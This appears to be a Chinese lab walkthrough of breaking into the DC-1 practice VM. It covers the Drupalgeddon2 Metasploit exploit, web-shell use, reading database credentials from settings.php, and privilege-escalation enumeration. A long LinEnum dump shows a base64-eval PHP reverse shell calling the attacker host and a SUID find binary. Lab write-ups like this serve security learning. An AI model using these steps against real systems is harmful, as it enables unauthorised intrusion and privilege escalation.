将靶场搭建起来后，由于桥接模式下看不到靶机的 IP，于是用 masscan 对 C 段进行扫描，先试试 80 和 8080 端口。

访问之后发现是个drupal

掏出msf搜索一波

使用年份最新的 exp 进行尝试：

 exploit/unix/webapp/drupal_drupalgeddon2

攻击成功 返回meterpreter的shell

进行简单的信息收集

发现当前并不是 root 权限，需要想办法提权。首先执行常用的 Linux 提权检查工具：

./Linux_Exploit_Suggester.pl

并没有返回可用的提权建议，于是用 searchsploit 按内核版本 3.2.0 搜索尝试。

标红框的 exp.c 编译没有成功，提权失败。

上菜刀方便查看文件 shell.php

尝试进行 Linux 下的 MySQL UDF 提权。

思路是先用菜刀翻看站点连接数据库所用的账户，看它是否是高权限账户：

/var/www/sites/default/settings.php

发现了账号密码，但估计不是高权限账户。

连接尝试

并不是root高权限

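然后用 Linux 提权检查工具 LinEnum.sh 查看弱点。输出很长，重点留意其中 “Possibly interesting SUID files” 一节：/usr/bin/find 属主为 root 且带有 SUID 位，这并非发行版的默认权限，加固时应去掉该位。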

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.95

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Tue May 7 01:08:48 AEST 2019

### SYSTEM ##############################################
[00;31m[-] Kernel information:[00m
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux [00;31m[-] Kernel information (continued):[00m
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 [00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/" [00;31m[-] Hostname:[00m
DC-1 [00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data) [00;31m[-] Users that have previously logged onto the system:[00m
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019 [00;31m[-] Who else is logged on:[00m
01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) [00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash [00;31m[-] Super user account(s):[00m
root [00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 [00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes [00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env [00;31m[-] Path information:[00m
/usr/local/bin:/usr/bin:/bin [00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash [00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx [00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK 022 [00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512 [00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab /etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 510 May 10 2018 php5 /etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 633 May 30 2018 apache2
-rwxr-xr-x 1 root root 14985 Oct 24 2014 apt
-rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude
-rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 May 3 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base
-rwxr-xr-x 1 root root 89 May 17 2012 logrotate
-rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db
-rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate
-rwxr-xr-x 1 root root 249 May 26 2012 passwd /etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 907 Jun 19 2012 man-db [00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do. SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# [00;33m### NETWORKING ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0 MiB) lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) [00;31m[-] ARP history:[00m
192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE [00;31m[-] Nameserver(s):[00m
nameserver 192.168.16.254
nameserver 0.0.0.0 [00;31m[-] Default route:[00m
default via 192.168.16.254 dev eth0 [00;31m[-] Listening TCP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - [00;31m[-] Listening UDP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:59942 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:769 0.0.0.0:* -
udp 0 0 127.0.0.1:801 0.0.0.0:* -
udp 0 0 0.0.0.0:21881 0.0.0.0:* -
udp6 0 0 :::52815 :::* -
udp6 0 0 :::28256 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::769 :::* - [00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]
root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]
root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]
root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]
root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]
root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]
root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]
root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]
root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]
root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]
root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]
root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]
root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]
root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]
root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]
root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]
root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]
root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]
root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]
root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]
root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]
root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]
root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]
root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]
root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]
root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]
root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]
root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]
root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]
root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]
root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]
root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]
root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]
root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]
root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]
root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]
root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]
root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]
root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]
root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]
root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]
root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]
root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]
root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]
root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]
root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]
root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]
root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon
root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]
root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]
root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w
statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd
root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon
root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]
root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]
root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd
root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5
root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid
root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start
daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd
103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start
www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start
root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron
root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error
101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m
root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2
root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3
root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4
root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5
root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6
root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]
root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd
root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1
www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(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.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));'
www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(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.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));
www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh
www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh
root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]
root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]
www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a
www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux [00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
-rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty
-rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind
-rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd
-rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd [00;31m[-] /etc/init.d/ binary permissions:[00m
total 280
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start
-rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop
-rw-r--r-- 1 root root 2427 Oct 16 2012 README
-rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid
-rwxr-xr-x 1 root root 7820 May 26 2018 apache2
-rwxr-xr-x 1 root root 1071 Jun 25 2011 atd
-rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs
-rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh
-rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh
-rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup
-rwxr-xr-x 1 root root 3033 Jul 3 2012 cron
-rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus
-rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4
-rwxr-xr-x 1 root root 1329 Oct 16 2012 halt
-rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh
-rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh
-rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd
-rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup
-rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs
-rwxr-xr-x 1 root root 1990 May 21 2012 kmod
-rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans
-rwxr-xr-x 1 root root 995 Oct 16 2012 motd
-rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh
-rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh
-rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh
-rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh
-rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
-rwxr-xr-x 1 root root 4322 Mar 14 2013 networking
-rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common
-rwxr-xr-x 1 root root 1346 May 20 2012 procps
-rwxr-xr-x 1 root root 6120 Oct 16 2012 rc
-rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local
-rwxr-xr-x 1 root root 117 Oct 16 2012 rcS
-rwxr-xr-x 1 root root 639 Oct 16 2012 reboot
-rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond
-rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin
-rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind
-rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog
-rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs
-rwxr-xr-x 1 root root 590 Oct 16 2012 single
-rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton
-rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh
-rwxr-xr-x 1 root root 8827 Nov 9 2012 udev
-rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab
-rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs
-rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh
-rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot
-rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom
-rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils
-rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common [00;31m[-] /etc/init/ config file permissions:[00m
total 48
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf
-rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf
-rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf
-rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf
-rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf
-rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf
-rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf
-rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf
-rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf [00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system /lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service
-rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket
-rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service
-rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket
-rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket
-rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service
-rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service
-rw-r--r-- 1 root root 384 Apr 29 2013 udev.service
-rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service
-rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket /lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket
lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket /lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service [00;33m### SOFTWARE #############################################[00m
[00;31m[-] MYSQL version:[00m
mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 [00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data [00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl [00;31m[-] Installed compilers:[00m
ii checkpolicy 2.1.8-2 i386 SELinux policy compiler
